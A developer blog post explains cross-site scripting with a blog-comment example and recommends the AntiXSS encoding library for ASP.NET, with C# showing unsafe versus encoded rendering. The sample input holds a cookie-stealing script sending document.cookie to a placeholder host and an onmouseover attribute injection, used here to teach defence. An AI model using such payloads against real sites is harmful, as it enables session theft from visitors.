Security is a major concern for our clients when they ask us to develop their websites, so we have to take care of attacks like SQL injection and cross-site scripting. Today I came across a very good library for protecting a website against cross-site scripting attacks.
Cross-site scripting (XSS) attacks occur when an attacker uses a web application to deliver malicious code, generally in the form of a browser-side script (that is, JavaScript), to a different end user.
A simple example of this kind of attack works like this:
- A hacker, whom I will call Mr Jack, notices that my blog's comment system doesn't screen input (that is, my blog application does not check what kind of input arrives in the comments).
- Mr Jack posts some malicious content, maybe something with a script tag, or maybe something that steals cookies, like:
“Great post! nice article div.. “
- The next person to visit my site, whom I will call Mr Goodguy, is presented with the HTML that Mr Jack posted in the comment. It grabs his cookies and sends them off to Mr Jack's server.
That means my site has become vulnerable and will harm faithful followers and visitors of my blog like Mr Goodguy: Mr Jack steals Mr Goodguy's data as soon as Mr Goodguy visits my blog.
This is a simple example, but as you can imagine, these attacks can get pretty devious. Twitter, Facebook, MySpace, LinkedIn and now Google+ have all been hit with this. Take a look at the OWASP writeup for more info, and at the XSS Cheat Sheet at ha.ckers.org to get an idea of how sneaky these attacks can be.
AntiXSS is a part of the Windows Protection Library and provides a set of encoding functions that help prevent XSS attacks in ASP.NET apps. Whereas the standard .NET Framework encoding uses a blacklist approach, filtering out known bad characters such as <, > and ", the AntiXSS library uses a whitelist of known good characters and encodes everything else. AntiXSS also covers character sets across many different languages, so it works with the globalized and localized pages of your websites. Because of this whitelist approach, AntiXSS is inherently safer against new XSS attacks that rely on characters a blacklist did not anticipate.
There are two ways you can use AntiXSS in your ASP.NET applications:
1. Call the AntiXSS Encoder directly in your application code (for example in controller code and View markup in ASP.NET MVC, or in code-behind and page markup in ASP.NET Web Forms).
2. If you're using ASP.NET 4.0, you can also register AntiXSS as the default encoder, which ASP.NET will then use whenever it needs to encode output. The recommended approach is to use AntiXSS as your default encoder.
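As an added example (not code from the original post or from the library itself), here is the blog comment scenario from above rendered once unsafely and once with the AntiXSS Encoder, with the web.config line for option 2 in a comment; the assembly name `AntiXssLibrary` in that line is an assumption for AntiXSS 4.x and should be checked against the version you download.

```csharp
using System;
using Microsoft.Security.Application; // AntiXSS: Encoder.HtmlEncode, Encoder.HtmlAttributeEncode

// Option 2 (ASP.NET 4.0): make AntiXSS the default encoder for <%: %> and HttpUtility.
// Add inside <system.web> in web.config (assembly name assumed for AntiXSS 4.x):
//   <httpRuntime encoderType="Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary" />

public static class CommentRenderer
{
    // Vulnerable: Mr Jack's comment body is written into the page verbatim, so any
    // <script> it contains runs in Mr Goodguy's browser with access to his cookies.
    public static string RenderUnsafe(string author, string body)
    {
        return "<div class=\"comment\" title=\"" + author + "\"><b>" + author + "</b>: "
             + body + "</div>";
    }

    // Hardened (option 1): every untrusted value is encoded for the context it lands in.
    // HtmlEncode lets only whitelisted characters through, so "<script>" is emitted as
    // "&lt;script&gt;" and the browser shows it as text; HtmlAttributeEncode is the
    // stricter variant for values placed inside an attribute.
    public static string RenderSafe(string author, string body)
    {
        return "<div class=\"comment\" title=\"" + Encoder.HtmlAttributeEncode(author) + "\"><b>"
             + Encoder.HtmlEncode(author) + "</b>: "
             + Encoder.HtmlEncode(body) + "</div>";
    }

    public static void Main()
    {
        // Constructed sample input standing in for Mr Jack's comment.
        string author = "Mr Jack\" onmouseover=\"alert(1)";
        string body = "Great post! <script>document.location='http://example.invalid/?c='+document.cookie</script>";

        Console.WriteLine(RenderUnsafe(author, body)); // script tag reaches the browser intact
        Console.WriteLine(RenderSafe(author, body));   // script tag arrives as &lt;script&gt;... text
    }
}
```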
To download AntiXSS, go to CodePlex: download
I hope this will help you overcome your website's cross-site scripting vulnerabilities.